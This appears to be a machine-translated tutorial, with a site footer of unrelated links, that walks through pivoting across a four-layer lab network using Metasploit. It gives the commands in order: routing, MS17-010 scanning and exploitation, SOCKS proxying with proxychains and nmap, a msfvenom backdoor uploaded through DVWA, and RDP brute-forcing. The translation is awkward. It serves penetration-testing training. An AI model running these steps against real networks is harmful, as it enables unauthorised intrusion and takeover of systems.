hypothesis , There is a multi-layer network environment , Each layer of target only communicates with adjacent servers , that , How to get from Hack Notebook breakthrough , Get to page No 4 Layer target Server5 What about the system permissions ?

first , We passed Web Intrusion acquisition Server1 jurisdiction , And through lateral penetration to Server2, learn Server2 Internet access , Dual network card . stay
here , We use Server2 The intruder continued to attack as a springboard .

The first 1 Layer target → The first 2 Target aircraft

1, Get intranet segment information
meterpreter > run get_local_subnets [!] Meterpreter scripts are deprecated.
Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute
OPTION=value [...]Local subnet: 10.0.0.0/255.255.255.0Local subnet:
10.0.1.0/255.255.255.0
Query through intranet local route , We can learn that the address of the intranet segment is :10.0.1.0/24.

2, Add to layer 2 intranet segment (10.0.1.0/24) Static routing for .
meterpreter > run autoroute -s 10.0.1.0/24 [!] Meterpreter scripts are
deprecated. Try post/multi/manage/autoroute.[!] Example: run
post/multi/manage/autoroute OPTION=value [...][*] Adding a route to
10.0.1.0/255.255.255.0...[+] Added route to 10.0.1.0/255.255.255.0 via
10.0.0.3[*] Use the -p option to list all active routes

3, Scan intranet host , use msf Under the scanning module pair IP Scan to see if it is saved MS17-010 loophole .
use auxiliary/scanner/smb/smb_ms17_010 show optionsset rhosts 10.0.1.0/24set
threads 50run
Found by scanning 10.0.1.2 existence MS-17010 loophole .

4, adopt MS-17010 Vulnerability acquisition Server3 System permissions for .
use exploit/windows/smb/ms17_010_psexec set rhost 10.0.1.2 set payload
windows/meterpreter/bind_tcp run
5, Successfully obtained the second layer target authority , see ip address , Third segment found .

The first 2 Layer target → The first 3 Target aircraft

1, Static reason to add a third segment .
meterpreter > run autoroute -s 10.0.2.0/24 [!] Meterpreter scripts are
deprecated. Try post/multi/manage/autoroute.[!] Example: run
post/multi/manage/autoroute OPTION=value [...][*] Adding a route to
10.0.2.0/255.255.255.0...[+] Added route to 10.0.2.0/255.255.255.0 via
10.0.1.2[*] Use the -p option to list all active routes
2, use MS17-010 The scanning was fruitless , find 10.0.2.2 Host survival , utilize msf build socks agent
use auxiliary/server/socks4aset srvport 9999run
3, On the attack plane Kali in , Modify configuration file /etc/proxychains.conf
socks4 10.0.0.2 9999
4, use proxychains Scan the port of the third layer target :
proxychains nmap -Pn -sT 10.0.2.2 -p1-1000
5, stay Firefox Set in socks agent .

You can directly access the third layer target locally , stay DVWA in , Upload via any file msf back door , Get site permissions .

6, utilize msfvenom Generate Trojan backdoor :
msfvenom -p windows/meterpreter/bind_tcp LPORT=8888 -f exe > shell.exe Attacker monitoring :
use exploit/multi/handlerset PAYLOAD windows/meterpreter/bind_tcpset RHOST
10.0.2.2set LPORT 8888set ExitOnSession falseexploit -j -z
7, stay webshell in , Upload and execute successfully shell.exe, Successful return Server4 Permissions for .

The first 3 Layer target → The first 4 Target aircraft

1, Static reason to add fourth segment .
meterpreter > run autoroute -s 10.0.3.0/24 [!] Meterpreter scripts are
deprecated. Try post/multi/manage/autoroute.[!] Example: run
post/multi/manage/autoroute OPTION=value [...][*] Adding a route to
10.0.3.0/255.255.255.0...[+] Added route to 10.0.3.0/255.255.255.0 via
10.0.2.2[*] Use the -p option to list all active routes
2, use msf open socks
use auxiliary/server/socks4aset srvport 6666run
3, Detect the surviving host of the fourth segment , find 10.0.3.2 It's open 3389 port .
proxychains nmap -Pn -sT 10.0.3.0/24 -p22,80,3389
4, Set the 3389 Traffic is forwarded to the proxy server .

5, Locally, yes RDP The account and password will be exploded :

6, After successful blasting , Log in to the server successfully with account and password .

Technology
©2019-2020 Toolsou All rights reserved,
Maximum security risk of cloud computing : Unclear safety responsibility python Dynamic programming for single source shortest path 415 Status code to background error Ai Wei also talks about project management , On grass roots management git Pull the remote branch and switch to it jmeter-while Summary of controller use ELementUI select Multi select drop-down box to get all properties of the selected item rk3399_android7.1 debugging USB Summary of Bluetooth module ( Essence )2020 year 6 month 26 day C# Class library Log help class vue monitor Treeselect Change of options